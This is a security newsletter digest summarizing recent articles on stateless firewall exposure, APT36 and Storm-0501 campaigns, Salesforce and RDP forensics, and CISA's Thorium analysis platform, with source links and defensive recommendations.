The Deep Purple Sec – August 2025

📝 Beyond the Horizon: Uncovering Hosts and Services Behind Misconfigured Firewalls

This study thoroughly explores the risks of poorly configured stateless firewalls, which permit incoming traffic if the source port aligns with an outgoing rule. A 2014 vulnerability impacted Microsoft and Apple, prompting researchers to scan the IPv4 space a decade later. They discovered nearly 2.5 million newly accessible services on over 2 million previously masked IP addresses, frequently exhibiting a failing security posture: outdated systems, weak encryption, and known vulnerabilities.

To evaluate exploitation by attackers, researchers employed honeypots behind stateless firewalls. Results show this method is seldom used today, but it is poised to regain popularity. The study underscores the necessity of reviewing firewall rules, applying patches, and enhancing authentication, while the exclusion of IPv6 presents future risks for devices behind NATs and stateless firewalls.

📌 Source: Thinkst Scapes Q2 https://thinkst.com/ts/

📝 APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

CYFIRMA’s article outlines a cyber-espionage campaign by APT 36 (Transparent Tribe) that targets the Indian government and various sectors. The attack employs phishing emails containing malicious « .desktop » files that, when opened on BOSS Linux, download custom payloads, leveraging BOSS’s auto-start feature for persistent access. CYFIRMA emphasizes that this demonstrates APT 36’s increasing sophistication. Recommendations include enhancing phishing awareness, filtering « .desktop » attachments, and implementing BOSS-specific defenses.

📌 Source: https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/

📝 Storm-0501’s evolving techniques lead to cloud-based ransomware

The Microsoft article outlines the evolution of techniques used by Storm-0501, which has transitioned from traditional ransomware to cloud-based attacks. Storm-0501 effectively exploits cloud capabilities to exfiltrate data, destroy backups, and extort victims without deploying malware. Their strategy leverages compromised hybrid identities to escalate privileges to global administrator rights. Once in the cloud, they utilize AzureHound to map resources, bypass protections, and delete critical data while encrypting the remainder. These attacks take advantage of gaps between local and cloud environments, particularly when security solutions fail to cover all endpoints.

To defend against these threats, Microsoft strongly recommends strengthening cloud identity security, protecting Azure resources, and actively monitoring for suspicious activities. The article emphasizes the necessity of adopting a zero trust approach and correcting default configurations.

📌 Source: https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/

📝 A Primer on Forensic Investigation of Salesforce Security Incidents

The article clearly outlines how to conduct a forensic investigation into Salesforce security incidents using three essential elements: logs, permissions, and backups. It emphasizes the importance of analyzing logs with tools like Event Monitoring to detect anomalies, particularly suspicious API activities. In cases of data exfiltration, log details and Field History Tracking are crucial for reconstructing incidents. Automating responses with Transaction Security Policies (TSP) significantly enhances security by blocking risky actions. A proactive preparation — including monitoring, permission management, and backups — is essential to limit incident impact and accelerate resolution.

📌 Source: https://www.salesforce.com/blog/a-primer-on-forensic-investigation-of-salesforce-security-incidents/

🛠️ Thorium Platform Public Availability

CISA, in collaboration with Sandia National Laboratories, has launched Thorium, an open-source platform for automated large-scale file analysis. This platform empowers cybersecurity teams to automate workflows by integrating commercial, open-source, or custom tools for malware analysis, digital forensics, and incident response. Thorium delivers scalability (over 10 million files per hour), rapid search performance, and features like result tagging and full-text search. Users can define event triggers and control the platform through a RESTful API.

CISA strongly encourages teams to adopt Thorium to enhance analysis capabilities and provide valuable feedback. The platform is available on GitHub with comprehensive resources for deployment and use.

📌 Source: https://www.cisa.gov/news-events/alerts/2025/07/31/thorium-platform-public-availability

📝 RDP Forensics Part 1: Fingerprinting Attacks with Keyboard Layout Data

The article clearly explains how keyboard input data from the Remote Desktop Protocol (RDP) can be effectively exploited to profile an attacker. By analyzing the client’s « local input, » investigators can accurately find corresponding keys in the remote system’s registry and determine whether the setting was introduced during the RDP connection or was already present. The author presents compelling scenarios where an attacker uses a non-installed keyboard layout, revealing the client’s language in the Windows event log and providing geographical clues. If the layout is available under the user profile, it complicates the process of distinguishing between legitimate input and remote provenance. The article also highlights the method’s limitations and confidently proposes best practices to enhance RDP forensic investigations.

📌 Source: https://medium.com/@thedigitaldetective/remote-desktop-protocol-using-client-keyboard-input-in-attack-attribution-and-profiling-94a76f0f4ff4